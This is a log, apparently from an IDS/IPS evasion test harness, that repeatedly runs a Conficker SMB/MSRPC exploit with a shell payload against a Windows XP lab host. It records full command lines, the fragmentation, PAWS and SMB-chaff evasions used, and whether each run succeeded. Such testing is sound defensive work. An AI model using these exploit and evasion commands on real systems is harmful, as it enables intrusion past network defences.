- The following evasions are applied from stage smb_connect to smb_opentree:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * Invalid TCP checksum.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has 0x00 bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.112:26909 -> 10.35.1.207:445
- Terminated
- .....
- 9006 runs averaging 1.92 runs / second ; progress: 4696/43200..................
- 9024 runs averaging 1.92 runs / second ; progress: 4701/43200.....2015-06-08 00:37:52 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65431 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=OeNPvjc5Qpo --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"75%","inc","random_alpha" --evasion=[msrpc_req,end]smb_decoytrees,"4","6","8","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed OeNPvjc5Qpo
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has random alphabetic bytes as payload
- The following evasions are applied from stage msrpc_req to end:
- - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.117:65431 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .....2015-06-08 00:37:54 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18113 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=5emIDQWoFM4 --evasion=[smb_connect,end]smb_chaff,"21","write_flag","alphanum" --evasion=[smb_openpipe,end]tcp_paws,"25%","234116151","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 5emIDQWoFM7
- The following evasions are applied from stage smb_connect to end:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 234116151> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.112:18113 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 9044 runs averaging 1.92 runs / second ; progress: 4706/43200.......................
- 9067 runs averaging 1.92 runs / second ; progress: 4711/43200.................
- 9084 runs averaging 1.93 runs / second ; progress: 4716/43200..
- 9086 runs averaging 1.92 runs / second ; progress: 4721/43200
- 9086 runs averaging 1.92 runs / second ; progress: 4726/43200...........
- 9097 runs averaging 1.92 runs / second ; progress: 4731/43200...............
- 9112 runs averaging 1.92 runs / second ; progress: 4736/43200......
- 9118 runs averaging 1.92 runs / second ; progress: 4741/43200......
- 9124 runs averaging 1.92 runs / second ; progress: 4746/43200........
- 9132 runs averaging 1.92 runs / second ; progress: 4751/43200..........
- 9142 runs averaging 1.92 runs / second ; progress: 4756/43200....
- 9146 runs averaging 1.92 runs / second ; progress: 4761/43200.2015-06-08 00:38:54 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17243 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=mBAIsd7uGQ8 --evasion=[smb_openpipe,end]smb_decoytrees,"7","1","3","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]tcp_overlap,"6","new","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed mBAIsd7uGQ+
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - TCP segments are set to overlap by 6 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 7 SMB trees are opened and 1 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.110:17243 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 9149 runs averaging 1.92 runs / second ; progress: 4766/43200.........
- 9158 runs averaging 1.92 runs / second ; progress: 4771/43200..........
- 9168 runs averaging 1.92 runs / second ; progress: 4776/43200...............
- 9183 runs averaging 1.92 runs / second ; progress: 4782/43200...2015-06-08 00:39:16 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30782 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=0FzzJYfIw6U --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"6","6","2048","random_alphanum" --evasion=[start,end]tcp_paws,"5","4","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 0FzzJYfIw6X
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 2048 random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.117:30782 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 9187 runs averaging 1.92 runs / second ; progress: 4787/43200.....
- 9192 runs averaging 1.92 runs / second ; progress: 4792/43200...
- 9195 runs averaging 1.92 runs / second ; progress: 4797/43200.....
- 9200 runs averaging 1.92 runs / second ; progress: 4802/43200.
- 9201 runs averaging 1.91 runs / second ; progress: 4807/432002015-06-08 00:39:37 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41485 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=SM6cPJn5+OQ --evasion=[msrpc_bind,end]tcp_paws,"1","9","random" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed SM6cPJn5+OR
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random bytes as payload
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.117:41485 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 9205 runs averaging 1.91 runs / second ; progress: 4812/43200.........
- 9214 runs averaging 1.91 runs / second ; progress: 4817/43200........2015-06-08 00:39:51 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43229 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=fd/3gZhjdgM --evasion=[smb_opentree,end]tcp_paws,"75%","240370247","shuffle" --evasion=[smb_opentree,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed fd/3gZhjdgN
- The following evasions are applied from stage smb_opentree to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 240370247> and has shuffled original payload
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.112:43229 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ....
- 9227 runs averaging 1.91 runs / second ; progress: 4822/43200......
- 9233 runs averaging 1.91 runs / second ; progress: 4827/43200.
- 9234 runs averaging 1.91 runs / second ; progress: 4832/43200
- 9234 runs averaging 1.91 runs / second ; progress: 4837/43200.....
- 9239 runs averaging 1.91 runs / second ; progress: 4842/43200.......
- 9246 runs averaging 1.91 runs / second ; progress: 4847/43200
- 9246 runs averaging 1.91 runs / second ; progress: 4852/43200
- 9246 runs averaging 1.90 runs / second ; progress: 4857/43200.2015-06-08 00:40:30 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25007 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=4t8G7ohmFd8 --evasion=[smb_connect,msrpc_bind]smb_chaff,"13","write_flag","msrpc" --evasion=[smb_openpipe,end]smb_decoytrees,"4","4","2","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed 4t8G7ohmFd/
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 4 SMB trees are opened and 4 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.112:25007 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 9251 runs averaging 1.90 runs / second ; progress: 4862/43200...........
- 9262 runs averaging 1.90 runs / second ; progress: 4867/43200.....
- 9267 runs averaging 1.90 runs / second ; progress: 4872/43200.Pid 10886 timed out - killed
- 2015-06-08 00:40:43 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14403 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=ozOEXUfZ3/w --evasion=[smb_openpipe,end]smb_chaff,"3","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed ozOEXUfZ3/y
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - Before every 3th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.111:14403 -> 10.35.1.207:445
- Terminated
- ....
- 9273 runs averaging 1.90 runs / second ; progress: 4877/43200......
- 9279 runs averaging 1.90 runs / second ; progress: 4882/432002015-06-08 00:40:52 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38297 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=rrkcEtoysN8 --evasion=[smb_connect,smb_openpipe]ipv4_frag,"56" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","268435454","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed rrkcEtoysN+
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - IPv4 fragments with at most 56 bytes per fragment
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.112:38297 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .Pid 11141 timed out - killed
- 2015-06-08 00:40:53 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64976 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=nm6gz4exUZ4 --evasion=[start,netbios_connect]tcp_paws,"75%","268435455","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed nm6gz4exUZ6
- The following evasions are applied from stage start to netbios_connect:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a random urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.119:64976 -> 10.35.1.207:445
- Terminated
- .......
- 9289 runs averaging 1.90 runs / second ; progress: 4887/43200.........
- 9298 runs averaging 1.90 runs / second ; progress: 4892/43200...
- 9301 runs averaging 1.90 runs / second ; progress: 4897/43200.....
- 9306 runs averaging 1.90 runs / second ; progress: 4902/43200.....
- 9311 runs averaging 1.90 runs / second ; progress: 4907/43200.........
- 9320 runs averaging 1.90 runs / second ; progress: 4912/43200.2015-06-08 00:41:23 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39207 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=3I+N5IlyQj0 --evasion=[smb_opentree,end]smb_writeandxpad,"1024","random_alphanum" --evasion=[msrpc_req,end]tcp_paws,"1","268435454","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed 3I+N5IlyQj3
- The following evasions are applied from stage smb_opentree to end:
- - 1024 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.112:39207 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- Pid 11571 timed out - killed
- 2015-06-08 00:41:23 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32339 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=jX8rcN/h25o --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"16" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed jX8rcN/h25q
- The following evasions are applied from stage smb_opentree to end:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 16 bytes per fragment
- Info: NetBIOS connection 10.62.90.118:32339 -> 10.35.1.207:445
- Terminated
- ..........
- 9333 runs averaging 1.90 runs / second ; progress: 4917/43200.........2015-06-08 00:41:30 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34803 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=tmDsj+XmrZ8 --evasion=[netbios_connect,end]ipv4_frag,"632" --evasion=[msrpc_req,end]tcp_paws,"50%","10","shuffle30" --evasion=[msrpc_req,end]tcp_segvar,"24730","31998" --verifydelay=1000 --payload=shell
- Info: Using random seed tmDsj+XmrZ+
- The following evasions are applied from stage netbios_connect to end:
- - IPv4 fragments with at most 632 bytes per fragment
- The following evasions are applied from stage msrpc_req to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 30 bytes of original payload, then shuffled original payload
- - TCP packets are segmented to contain between 24730 and 31998 bytes of payload.
- Info: NetBIOS connection 10.62.90.119:34803 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..
- 9345 runs averaging 1.90 runs / second ; progress: 4922/43200..........
- 9355 runs averaging 1.90 runs / second ; progress: 4927/43200..........
- 9365 runs averaging 1.90 runs / second ; progress: 4932/43200...............
- 9380 runs averaging 1.90 runs / second ; progress: 4937/43200.........
- 9389 runs averaging 1.90 runs / second ; progress: 4942/43200...........
- 9400 runs averaging 1.90 runs / second ; progress: 4947/43200...........
- 9411 runs averaging 1.90 runs / second ; progress: 4952/43200.........2015-06-08 00:42:05 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11897 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=1Pcgp2wrgcE --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"456" --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"6","6","2","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","216017382","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed 1Pcgp2wrgcH
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 216017382> and has shuffled original payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 2 random alphanumeric bytes.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - IPv4 fragments with at most 456 bytes per fragment
- Info: NetBIOS connection 10.62.90.118:11897 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ........
- 9429 runs averaging 1.90 runs / second ; progress: 4957/43200.............
- 9442 runs averaging 1.90 runs / second ; progress: 4962/43200......2015-06-08 00:42:15 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25532 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=biR6QHYn0fA --evasion=[smb_connect,end]ipv4_frag,"56" --evasion=[msrpc_bind,end]tcp_paws,"75%","57019005","alpharandomized" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed biR6QHYn0fB
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments with at most 56 bytes per fragment
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 57019005> and has original payload with alphabetic bytes randomized
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.112:25532 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 2015-06-08 00:42:17 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53786 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=6PvoPo84oSk --evasion=[start,smb_connect]tcp_chaff,"2","chksum|nullchksum|nullflag","unmodified" --evasion=[netbios_connect,end]tcp_paws,"75%","208945","alpharandomized" --evasion=[netbios_connect,smb_openpipe]tcp_segvar,"63557","65534" --verifydelay=1000 --payload=shell
- Info: Using random seed 6PvoPo84oSn
- The following evasions are applied from stage start to smb_connect:
- The following evasions are applied from stage netbios_connect to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 208945> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - TCP packets are segmented to contain between 63557 and 65534 bytes of payload.
- Info: NetBIOS connection 10.62.90.112:53786 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 9450 runs averaging 1.90 runs / second ; progress: 4967/43200..
- 9452 runs averaging 1.90 runs / second ; progress: 4972/43200
- 9452 runs averaging 1.90 runs / second ; progress: 4977/43200Pid 12388 timed out - killed
- 2015-06-08 00:42:29 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25941 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=HYzAAspzemw --evasion=[smb_opentree,smb_openpipe]tcp_paws,"13","268435455","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed HYzAAspzemw
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.116:25941 -> 10.35.1.207:445
- Terminated
- ..2015-06-08 00:42:31 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37295 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=f4Rayn2XGBc --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_ebcdic","float_vax","byte3_zero","byte4_zero" --evasion=[netbios_connect,smb_opentree]tcp_paws,"2","6","alpharandomized" --evasion=[msrpc_bind,end]tcp_paws,"3","4","random" --verifydelay=1000 --payload=shell
- Info: Using random seed f4Rayn2XGBd
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - MSRPC NDR flag is modified:
- * EBCDIC character encoding
- * VAX floating point value encoding
- * Reserved 3rd byte is set to zero
- * Reserved 4th byte is set to zero
- Info: NetBIOS connection 10.62.90.117:37295 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 9459 runs averaging 1.90 runs / second ; progress: 4982/43200...............
- 9474 runs averaging 1.90 runs / second ; progress: 4988/43200..Pid 12663 timed out - killed
- 2015-06-08 00:42:38 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19557 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=MlzU34gI/UA --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"72" --evasion=[start,netbios_connect]ipv4_order,"firstlast" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed MlzU34gI/UA
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments are sent in correct order except that the first fragment comes last
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - IPv4 fragments with at most 72 bytes per fragment
- Info: NetBIOS connection 10.62.90.115:19557 -> 10.35.1.207:445
- Terminated
- ....
- 9481 runs averaging 1.90 runs / second ; progress: 4993/43200
- 9481 runs averaging 1.90 runs / second ; progress: 4998/43200
- 9481 runs averaging 1.90 runs / second ; progress: 5003/43200.........
- 9490 runs averaging 1.90 runs / second ; progress: 5008/43200......
- 9496 runs averaging 1.89 runs / second ; progress: 5013/43200Pid 13487 timed out - killed
- 2015-06-08 00:43:03 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39306 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Q0zugvYbYYA --evasion=[smb_opentree,smb_openpipe]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed Q0zugvYbYYB
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.113:39306 -> 10.35.1.207:445
- Terminated
- .....
- 9502 runs averaging 1.89 runs / second ; progress: 5018/43200....
- 9506 runs averaging 1.89 runs / second ; progress: 5023/43200...........2015-06-08 00:43:17 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17032 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=rkDra41C6CA --evasion=[smb_connect,smb_opentree]ipv4_frag,"64" --evasion=[msrpc_bind,msrpc_req]ipv4_opt,"25%","inc","alphanumrandomized" --evasion=[smb_opentree,end]tcp_paws,"1","4","random" --verifydelay=1000 --payload=shell
- Info: Using random seed rkDra41C6CC
- The following evasions are applied from stage smb_connect to smb_opentree:
- - IPv4 fragments with at most 64 bytes per fragment
- The following evasions are applied from stage smb_opentree to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 25% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- Info: NetBIOS connection 10.62.90.113:17032 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 9520 runs averaging 1.89 runs / second ; progress: 5028/43200.......
- 9527 runs averaging 1.89 runs / second ; progress: 5033/43200......
- 9533 runs averaging 1.89 runs / second ; progress: 5038/43200.Pid 13797 timed out - killed
- 2015-06-08 00:43:28 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45463 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=BmVQm+XD3os --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --evasion=[smb_openpipe,end]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed BmVQm+XD3os
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
